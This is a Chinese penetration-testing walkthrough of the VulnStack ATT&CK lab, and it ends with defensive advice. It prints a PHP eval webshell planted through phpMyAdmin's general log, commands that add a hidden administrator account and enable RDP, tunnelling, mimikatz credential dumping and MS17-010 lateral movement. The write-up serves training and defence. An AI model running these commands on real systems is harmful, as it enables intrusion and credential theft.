Vlunstack ATT&CK实战系列0x1
字数 1784 2025-08-18 11:39:19
VulnStack ATT&CK实战系列0x1 渗透测试教学文档
环境概述
靶机环境
-
Windows 7 (跳板机)
- 双网卡配置
- 外网IP: 192.168.31.129
- 内网IP: 192.168.52.143
- 运行服务: yxcms
- 角色: 内外网连接桥梁
- 双网卡配置
-
Windows 2008 (域控制器)
- 内网IP: 192.168.52.138
- 角色: 主域控制器(OWA)
-
Win2k3 (域内主机)
- 内网IP: 192.168.52.141
- 主机名: ROOT-TVI862UBEH
攻击流程
0x1. 获取WebShell
-
目标识别
- 发现yxcms系统: http://192.168.31.129/yxcms/
- 默认后台地址: http://192.168.31.129/yxcms/index.php?r=admin/index/login
-
漏洞利用
- 验证码绕过: 发现验证码不刷新,可爆破
- phpMyAdmin弱口令: root/root
- 日志写入WebShell:
set global general_log=on; set global general_log_file='C:/phpstudy/www/fuck.php'; select '<?php eval($_POST["fuck"])?>'; - yxcms后台爆破: admin/123456
- CSRF漏洞利用: 通过HTML表单生成第二个WebShell
-
WebShell连接
- 使用蚁剑连接
- 路径: http://192.168.31.129/yxcms/protected/apps/default/view/default/fuck.php
- 密码: fuck
0x2. 内网渗透
-
权限提升
- 确认当前为管理员权限
- 确认存在域环境
-
远程桌面配置
- 检查3389端口状态:
netstat -ano | find "3389" - 开启远程桌面:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- 检查3389端口状态:
-
用户添加
net user test @!FuckSEC!@ /add net localgroup administrators test /add net user test -
防火墙绕过
- 使用ngrok的FRP创建TCP隧道
- 执行命令:
sunny.exe --clientid=隧道id
0x3. 信息收集
-
网络环境
ipconfig /all查看网络配置net config Workstation查询计算机信息
-
进程与共享
tasklist /v查看进程net view查看共享资源
-
域信息
- 主域控制器: OWA (192.168.52.138)
- 其他主机: ROOT-TVI862UBEH (192.168.52.141)
0x4. 密码获取
-
Hash提取
- 使用CS的
hashdump读取内存密码 - 使用
mimikatz读取注册表密码:logonpasswords
- 使用CS的
-
获取凭证
- 获取Administrator明文密码: hongrisec@2019
0x5. 横向渗透
-
代理设置
- CS上开通socks通道:
socks 9999 - 攻击机配置proxychains:
socks4 127.0.0.1 9999 - 启动msf:
proxychains msfconsole
- CS上开通socks通道:
-
Win2k3渗透
- 端口扫描: 发现445开放
- 使用
admin/smb/ms17_010_command模块执行命令:net user test @!FuckSEC!@ /add net localgroup administrators test /add - 开启3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f - 连接:
proxychains rdesktop 192.168.52.141
-
Windows 2008渗透
- 端口扫描: 发现445, 80, 88, 135, 139, 389, 445等
- 使用
admin/smb/ms17_010_command添加用户 - IPC$连接上传上线马
- 使用计划任务执行
-
域控渗透
- 使用mimikatz获取域管凭证
关键技术与工具
-
Web漏洞利用
- 验证码绕过
- phpMyAdmin日志注入
- CSRF漏洞利用
-
内网穿透
- FRP隧道
- ngrok服务
-
横向移动
- MS17-010漏洞利用
- IPC$共享利用
- 计划任务执行
-
凭证获取
- mimikatz
- CS的hashdump
-
代理技术
- proxychains
- CS的socks代理
防御建议
-
Web应用安全
- 修复验证码逻辑漏洞
- 修改默认凭证
- 禁用不必要的数据库功能
-
系统安全
- 限制远程桌面访问
- 配置防火墙规则
- 及时修补已知漏洞(如MS17-010)
-
域安全
- 监控异常账户添加
- 限制域管账户使用范围
- 启用LSA保护
-
日志监控
- 监控异常进程创建
- 监控计划任务变更
- 监控注册表关键项修改
总结
本案例展示了从外网Web渗透到内网横向移动的完整攻击链,涉及Web漏洞利用、权限提升、内网穿透、横向移动和域渗透等多个技术环节。防御方应重点关注边界安全、权限控制和异常行为监控。